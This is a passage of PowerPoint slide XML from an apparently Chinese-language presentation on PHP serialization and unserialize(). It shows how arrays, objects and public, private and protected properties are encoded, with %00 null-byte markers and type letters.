            <a:off x="6489064" y="3508801"/>
            <a:ext cx="1831975" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>uns</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>erialize</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348287511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反序列化</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数组序列化</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4857C09-504E-DD43-90FF-42A803F79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280" y="2791460"/>
            <a:ext cx="10820654" cy="3731260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F05FD26-B283-4E4F-A325-BD94227E0E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127760" y="1582710"/>
            <a:ext cx="8351520" cy="1022268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>原数组：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>['a'=&gt;'str','b'=&gt;1,'c'=&gt;false]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>序列化后：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>a:3:{s:1:"a";s:3:"str";s:1:"b";i:1;s:1:"c";b:0;}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12248701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反序列化</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对象序列化</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801FC47B-79AB-374B-AE9D-C272ED2F2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560" y="1563356"/>
            <a:ext cx="8030210" cy="5294644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="椭圆形标注 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9E0781-99FB-5941-BE40-A24DCCF6B52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7955280" y="4693920"/>
            <a:ext cx="2133600" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>这里输出的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>’?’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>字符是空字符</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195203862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反序列化</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对象序列化</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37599BCB-234B-364F-A982-28FD76746690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="2255520"/>
            <a:ext cx="7513320" cy="3367525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中的类</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，属性</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>data=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>会被序列化为不同的形式（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>代表空字符）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>属性：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> s:4:"data";s:3:"abc"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Private</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>属性：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> s:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%00C%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>data";s:3:"abc"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Protected</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>属性：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> s:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>data";s:3:"abc"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400"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27650684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反序列化</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其它数据类型</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0CD889B-93D1-D74B-8DC3-53A3821FD0AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1432560" y="1838066"/>
            <a:ext cx="7254240" cy="3350404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（字符串）：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>nteger</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（整型）：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Bool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Bool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>型）：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（数组）：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（对象）：</a:t>
            </a:r>
            <a:r>
